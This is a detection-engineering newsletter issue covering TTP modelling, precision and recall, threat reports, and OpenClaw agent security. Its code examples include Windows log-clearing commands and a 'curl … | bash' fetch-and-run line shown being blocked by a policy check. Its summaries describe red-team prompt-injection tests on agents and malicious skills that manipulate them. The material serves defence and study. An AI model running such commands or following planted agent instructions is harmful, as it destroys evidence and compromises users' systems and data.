DEW #144 - Pyramid of Permanence and 🦞OpenClaw 🦞 Security Dumpster Fires

Lobster never tasted so good

Welcome to Issue #144 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

I’m in beautiful New York City this week, and finally made the move to get a hotel away from Times Square. Best decision ever. Even within Manhattan, anywhere is quieter than Times Square

I got OpenClaw up and running, and made a Moltbook account with it. This issue is also heavy on OpenClaw security because it’s a dumpster fire

I flew to my hometown and it was colder than New England and New York. The jet bridge at our arrival gate was frozen to the ground, and they spent 30 mins trying to get it moving. We eventually moved to a different jet bridge

Sponsor: Adaptive Security

Stop Deepfake Phishing Before It Tricks Your Team

Today’s phishing attacks involve AI voices, videos, and deepfakes of executives.

Adaptive is the security awareness platform built to stop AI-powered social engineering.

Protect your team with:

AI-driven risk scoring that reveals what attackers can learn from public data

Deepfake attack simulations featuring your executives

💎 Detection Engineering Gem 💎

TTPI’s: Extending the Classic Model by Andrew VanVleet

Tactics, Techniques & Procedures (TTPs) is a table-stakes term in our industry. It binds our understanding of attacker behavior into a common lexicon. Within this lexicon, MITRE ATT&CK reigns supreme, and they have some generally agreed-upon definitions within their ATT&CK FAQ. Basically, in order to understand MITRE ATT&CK, you have to understand their nomenclature of TTPs, where:

Tactics describe an adversarial objective, such as initial access

Techniques describe how an attacker can execute some operation to achieve that objective

Procedures describe the implementation details of a technique in a given environment

In this post, VanVleet challenges this model because the specific details of how an attack is carried out at the Procedure level can sometimes be vague. I think this is by design on MITRE’s part, because the procedure to achieve it can differ depending on the environmental context I mentioned earlier. He makes the analogy that Procedures are like a cake, not necessarily a recipe. He proposes the concept of Instance, which is the recipe itself, to achieve that procedure.



ATT&CK does get close to this via Detection Strategies. As an example, VanVleet looks at T1070.001, Indicator Removal: Clear Windows Event Logs. The MITRE page includes a description of how this can be achieved, but it seems high-level enough that some more detail on the recipe would be helpful. The detection strategy can provide more clues from an event-ID perspective, but without the technical implementation, it may be hard to recreate and test. Here’s his idea of what an Instance section could look like:

This could be helpful for detection engineers who want to recreate the attack in their own environment to test their telemetry generation and detection rules.


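To make the layering concrete, here is a minimal sketch of how a Procedure and its Instances could be stored as data. This is not VanVleet's schema: the class names, field names, and the choice of two example Instances are my own assumptions. The commands (`wevtutil cl` and the Windows PowerShell `Clear-EventLog` cmdlet) and Event ID 1102 (Security audit log cleared) are standard Windows behavior, but verify them in your own lab before relying on them.

```python
from dataclasses import dataclass, field


@dataclass
class Instance:
    """One concrete, reproducible way to carry out a procedure (the 'recipe')."""
    name: str
    command: str
    expected_event_ids: list[int] = field(default_factory=list)


@dataclass
class Procedure:
    """A procedure tied back to its ATT&CK tactic and technique (hypothetical layout)."""
    tactic: str
    technique_id: str
    technique_name: str
    summary: str
    instances: list[Instance] = field(default_factory=list)


# Example record for T1070.001. The tactic is the one ATT&CK listed for this
# technique at the time of writing; the Instances are illustrative, not exhaustive.
clear_logs = Procedure(
    tactic="Defense Evasion",
    technique_id="T1070.001",
    technique_name="Indicator Removal: Clear Windows Event Logs",
    summary="Clear the Security event log to remove evidence of activity",
    instances=[
        Instance("wevtutil", "wevtutil cl Security", [1102]),
        Instance("Windows PowerShell cmdlet", "Clear-EventLog -LogName Security", [1102]),
    ],
)

for inst in clear_logs.instances:
    print(f"{clear_logs.technique_id} via {inst.name}: {inst.command} -> {inst.expected_event_ids}")
```

A record like this gives you something to replay in a lab: run each Instance's command, then check that the expected event IDs show up in your telemetry.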

I’ve always had a hard time with the Pyramid of Pain for this exact reason. The “TTPs” part at the top of the Pyramid can encapsulate so much work, without any ability to reverse-engineer how the attack is captured. In fact, I’ve always thought TTPs/Tools should be combined, because almost every Procedure contains some level of tooling to capture the attack.

In the spirit of alliteration, and perhaps more as a thought exercise, he proposes the “Pyramid of Permanence”.

Basically, Procedures are what we want to capture, and everything below the tip of the Pyramid is an Instance that supports the Procedure. It’s an interesting thought experiment, and as long as it serves as a lexicon to drive the conversation on better modeling, I’m all for it.

🔬 State of the Art

The story of the 5-minute-long endpoint by Leónidas Neftalí González Campos

This is more software engineering-related, but I sometimes come across blogs where I can see how security analysts and software engineers alike can commiserate about working in a bureaucracy. Campos is a software engineer working on a customer appointment management product, and a JIRA ticket came in reporting that the simple task of uploading customers had started crashing on “large” uploads. They took the ticket, found a terrible pattern in their codebase that uploaded one user at a time, and deployed a fix in record time.

This is a story of how many bad small decisions and only shipping new features can lead to a monstrosity of an issue. My takeaway here for all my security readers is to challenge governance around your security operations, because optimizing decisions around a cool technology or an isolated problem can lead to a lot of heartache and burnout.

OpenClaw Observatory Report #1: Adversarial Agent Interaction & Defense Protocols by Udit Raj Akhouri

OpenClaw is the new hotness right now, and as expected, security researchers are running to poke holes in it, both from an architectural security perspective and, in this case, security agent efficacy. I thought this was a unique pentesting report, where Akhouri set up a red team/blue team exercise to test the blue team agent’s ability to prevent abuse of its own Lethal Trifecta trust relationships. In the first scenario, the red team agent sends a “help” threat detection template to set up a CI/CD project for detection testing. Within that CI/CD pipeline, a malicious cURL command and a bash script would download a payload and infect the blue team. In the second scenario, they tried something similar with a JSON template injection payload.

OpenClaw caught the first attack, and according to Akhouri, the blue team agent’s analysis of the second attack is still pending. I’m not too surprised that the blue team agent caught these types of attacks, but it goes to show how important it is to have emerging technologies and agent orchestration platforms undergo security testing to see how well they handle these scenarios.

Work travel means more podcasts, and it was great to dive back in with Jack Naglieri’s detection engineering-focused podcast, Detection at Scale. In this episode, Jack interviews Ryan Glynn from Compass and picks his brain on the use of LLMs in his day-to-day work as a staff security engineer.

I appreciated how Glynn grounds the LLM hype in what works and what doesn’t. At the beginning of the episode, he makes a great point about using LLMs to make binary decisions as an investigation technique. Basically, it’s much easier to look at a yes versus a no for an alert investigation and challenge its assumptions than to try to solve a lot of components at once.

He also shared his experience evaluating AI SOC vendors and how hard it was to understand their efficacy. For example, when an AI SOC agent says whether an alert is benign or malicious, it’ll at times make up steps along the way that never happened.

Glynn’s phishing detection setup was super interesting. He compared and contrasted the agony of training ML models for phishing before the advent of LLMs, where you’d need to set up various binary classification and entity extraction capabilities to achieve that binary feature. Now, you can still arrive at that binary feature and use more traditional models, but you use the LLM to generate the flag. It uses the LLM as a feature-extraction tool rather than a hegemonic security tool.
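Here is a rough sketch of the "LLM as feature extractor" pattern, not Glynn's actual pipeline. Everything in it is an assumption for illustration: `stub_llm_flag` is a keyword-based placeholder standing in for a real model call that answers one yes/no question, and the weights and bias are hand-picked rather than trained.

```python
import math
from typing import Callable


def stub_llm_flag(email_body: str) -> bool:
    """Placeholder for an LLM call answering a single yes/no question:
    'Does this email pressure the reader to act urgently?'
    A real setup would call a model here; this keyword check is only a stand-in."""
    cues = ("urgent", "immediately", "verify your account")
    body = email_body.lower()
    return any(cue in body for cue in cues)


def phishing_score(
    email_body: str,
    sender_is_external: bool,
    has_link: bool,
    llm_flag: Callable[[str], bool] = stub_llm_flag,
) -> float:
    """Combine the LLM-derived binary flag with traditional features
    in a plain logistic model. Weights and bias are hypothetical."""
    features = [
        1.0 if llm_flag(email_body) else 0.0,  # binary feature produced by the LLM
        1.0 if sender_is_external else 0.0,    # traditional feature
        1.0 if has_link else 0.0,              # traditional feature
    ]
    weights = [2.0, 1.0, 1.0]
    bias = -2.5
    z = bias + sum(w * x for w, x in zip(weights, features))
    return 1.0 / (1.0 + math.exp(-z))


suspicious = phishing_score("URGENT: verify your account now", True, True)
benign = phishing_score("Lunch on Thursday?", False, False)
print(f"suspicious={suspicious:.2f} benign={benign:.2f}")
```

The point of the design is that the LLM only answers a narrow yes/no question, so its output is easy to audit and challenge, while the final decision stays in a model you can measure.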

👊 Quick Hits

Precision & Recall in Detection Engineering by rootxover

It’s cool to see how others interpret the concepts of precision & recall within their own detection writing. In this post, RootXover covers the concepts in the context of detection engineering and provides an example of how to compute them in a phishing alert scenario. I liked their graph of the four “zones” of labels for detections:

Alert Storm: low precision, high recall

Detection Purgatory: low precision, low recall

Quiet but Risky: high precision, low recall

Dream Zone: high precision, high recall

I will say, it’s rare that I’ve ever seen the “Dream Zone” in my career. There’s a natural relationship between precision and recall where, in general, as one increases, the other decreases.
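For anyone who wants the arithmetic spelled out, here is a small sketch using made-up alert counts (not numbers from rootxover's post). Precision is TP / (TP + FP) and recall is TP / (TP + FN). The 0.5 cutoff that maps a detection to one of the four zones is my own assumption; the post does not define thresholds.

```python
def precision_recall(tp: int, fp: int, fn: int) -> tuple[float, float]:
    """Return (precision, recall) from true positive, false positive,
    and false negative counts. Empty denominators yield 0.0."""
    precision = tp / (tp + fp) if (tp + fp) else 0.0
    recall = tp / (tp + fn) if (tp + fn) else 0.0
    return precision, recall


def detection_zone(precision: float, recall: float, threshold: float = 0.5) -> str:
    """Map a detection to one of the four zones.
    The threshold is an illustrative assumption, not a standard."""
    high_precision = precision >= threshold
    high_recall = recall >= threshold
    if high_precision and high_recall:
        return "Dream Zone"
    if high_precision:
        return "Quiet but Risky"
    if high_recall:
        return "Alert Storm"
    return "Detection Purgatory"


# Hypothetical phishing rule: 100 alerts fired, 40 were real phish,
# and 10 real phish were missed entirely.
p, r = precision_recall(tp=40, fp=60, fn=10)
print(f"precision={p:.2f} recall={r:.2f} zone={detection_zone(p, r)}")
```

With these counts the rule catches most of the phish (recall 0.80) but only 40% of its alerts are real, which lands it in the Alert Storm zone.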

Task Management for Agentic Coding by Jimmy Vo

Friend of the newsletter, Jimmy Vo, dives into Anthropic’s task management framework, formerly to-dos and now called “tasks”. This isn’t a cybersecurity post, but I think the content is important if you are starting to leverage Claude Code to manage task and to-do lists. The obvious example of using tasks is alert triage, but I think it’s important for any security person to have a system for managing how they do work. Jimmy uses gardening tasks as an example, but it was cool to see how Claude can create the tasks, build dependency graphs, and put together a plan to achieve whatever task he issues.

☣️ Threat Landscape

I’m back on my Three Buddy Problem listening sprees, but this one was SO good to listen to just for the commentary on the wiper attack against Poland. The gang dives deep into a Polish CERT report where a Russian APT targeted 30 wind and solar farms, as well as a power plant, and issued a wiper attack to essentially shut them down. Of note, it was December, the dead of winter in Poland, and this heat and power outage threatened nearly half a million people.

The key argument here is how the reliance on Fortinet leads to these attacks. These appliances are notoriously bad at preventing exploitation due to poor coding practices. But if you want additional security support, you have to pay for services, since they don’t allow any forensic access to the devices.

Notepad++ Hijacked by State-Sponsored Hackers by Notepad++

Notepad++’s update servers were compromised from June 2025 to September 2025, according to Notepad++. Chinese-nexus actors allegedly compromised Notepad++’s hosting provider, leading them to redirect update traffic for downstream compromise. The specific language that the blog author used was that the “Shared Hosting Server” was compromised. It’s hard to say what the difference is between “shared” and their “hosting server”.

Did the APT find a way onto the shared server, escalate privileges, and laterally move to Notepad++? Or is this just semantics about using a VPS, and was Notepad++ specifically targeted? I’d be much more interested in the technical details of the former.

No Place Like Home Network: Disrupting the World's Largest Residential Proxy Network by Google Threat Intelligence Group (GTIG)

GTIG disrupted and took down a massive residential proxy network, IPIDEA. Residential proxy networks are akin to what Google calls Operational Relay Boxes (ORBs), but with a specific commercial application: you can “rent” exit points from unaware victims.

These networks operationalize their proxies by providing SDKs to mobile app providers that enroll devices into their networks. The mobile apps essentially get a cut of their profits, and IPIDEA sells access to these mobile phones for threat actors to abuse. This is especially helpful if you want to perform credential-stuffing attacks, ticket-scalping campaigns, or something more malicious, such as hiding C2 servers.

The report contains all kinds of technical details on how IPIDEA orchestrated its network of residential proxies. It operates like a command and control network, which is what makes it hard for me to see any legitimate use for these services.

OpenClaw in the Wild: Mapping the Public Exposure of a Viral AI Assistant by Silas Cutler

Threat Researcher G.O.A.T. (and my undergrad classmate!) Silas Cutler released a post in which he scanned and found OpenClaw instances exposed on the Internet. If you haven’t heard of OpenClaw, it’s an autonomous AI agent that took the Internet by storm due to its ability to connect to apps you own, such as your Brave Browser or 1Password, to do work on your behalf. It became especially popular with the advent of Moltbook, where these agents were given the ability to post on a Reddit-like site without any interaction from the owner.

When you start OpenClaw, you can use the CLI or a web server. So when searching for its default port on Censys, Silas found over 21,000 instances of OpenClaw exposed on the Internet. Most of these should be secured through a secret password or token, but it’s still worrying in the sense that due to its popularity, people will try to find ways to exploit these instances. And if they get on these instances, they’ll use the interface to abuse the integrations and extract everything, including passwords and email contents.

From Automation to Infection: How OpenClaw AI Agent Skills Are Being Weaponized by Bernardo Quintero

OpenClaw becomes more terrifying when you realize how extendable it is. In the agentic world, popularized by Claude Code, skills provide prompts and instructions to an agent, making it more specialized for running tasks. For example, if you want your agent to join Moltbook, you download a skill that teaches OpenClaw how to use the site, including using its API to perform heartbeat checks.

Several Skills registries emerged after OpenClaw’s popularity exploded, and VirusTotal researcher Quintero found malware on many of the Skills hosted on these sites. The numbers are pretty crazy:

At the time of writing, VirusTotal Code Insight has already analyzed more than 3,016 OpenClaw skills, and hundreds of them show malicious characteristics.

Quintero splits “malicious characteristics” into two groups: poor security practices and vulnerabilities, and straight-up malware. The malware is in plain English, and reminds me of ClickFix in the sense that it’s socially engineering your OpenClaw / Claude Code.

🔗 Open Source

trailofbits/claude-code-devcontainer

Sandbox environment for running Claude Code. You install a CLI and it boots up a container for you to run Claude in an isolated environment. It includes tooling to install remote container extensions in VSCode or Cursor, so it offers some options if you prefer an IDE over the CLI.

Dropkit lets you quickly bootstrap a secure DigitalOcean droplet. You provide Dropkit a DigitalOcean API key, and it’ll create a workspace with your SSH key and an out-of-the-box Tailscale installation. It has some cool cost-saving features that allow you to hibernate droplets so you aren’t spending money when you aren’t using them.

Runtime security monitoring for autonomous agents, including OpenClaw, Claude Code, LangChain and more. It exposes a set of tools that enforce policy boundaries, such as preventing network calls, local filesystem reads and writes, or shell commands.

You can configure it to allow or block certain actions based on the policy you set. It comes with some out-of-the-box policies and appears to follow a pattern similar to EDRs, intercepting risky functions and performing a security check before allowing them to execute.
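To illustrate the interception pattern in general terms, here is a minimal sketch of a policy check wrapped around risky functions. This is not the project's API: `POLICY`, `guarded`, `PolicyViolation`, and the action names are all hypothetical, and the guarded functions only return strings rather than touching the shell or filesystem.

```python
from functools import wraps


class PolicyViolation(Exception):
    """Raised when an action is not permitted by the active policy."""


# Hypothetical policy: action name -> allowed? Unknown actions are denied.
POLICY = {"shell": False, "network": False, "fs_read": True}


def guarded(action: str):
    """Decorator that checks the policy before letting the wrapped function run."""
    def decorator(func):
        @wraps(func)
        def wrapper(*args, **kwargs):
            if not POLICY.get(action, False):
                raise PolicyViolation(f"action '{action}' blocked by policy")
            return func(*args, **kwargs)
        return wrapper
    return decorator


@guarded("shell")
def run_shell(cmd: str) -> str:
    # Stand-in for a real shell call; nothing is executed here.
    return f"would run: {cmd}"


@guarded("fs_read")
def read_file(path: str) -> str:
    # Stand-in for a real file read.
    return f"would read: {path}"


print(read_file("/tmp/notes.txt"))
try:
    run_shell("curl http://example.com | bash")
except PolicyViolation as exc:
    print(f"blocked: {exc}")
```

Denying unknown actions by default is a deliberate choice in this sketch: a new tool an agent picks up should have to be explicitly allowed rather than silently permitted.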

Collection of dozens of threat hunting queries for KQL & CrowdStrike.

toborrm9/malicious_extension_sentry

Threat intelligence list of malicious Chrome extensions removed from the Chrome Web Store. This is especially helpful if you want to test detections in a lab environment on malicious extensions, or build out scanners in your environment to see if you can find net new ones.

Terrific roundup on the OpenClaw security issues. The VirusTotal finding of 3,016 skills with hundreds showing malicious characteristics is kinda wild when you think about how fast this ecosystem emerged. Reminds me of early npm days where supply chain attacks weren't really on anyone's radar. One thing worth noting is that the CLI vs web server distinction for OpenClaw deployment creates totally different attack surfaces for defenders to monitor.

We had a hard time with the Pyramid of Pain too. We found in the Summiting the Pyramid work we did that the lower levels mostly collapsed into similar amounts of "pain" for the adversary.

"Instance" is interesting. I like the additional details, which would be really helpful, but with the caveat that we don't want to get so specific that we recreate signature-based detections just with different observables.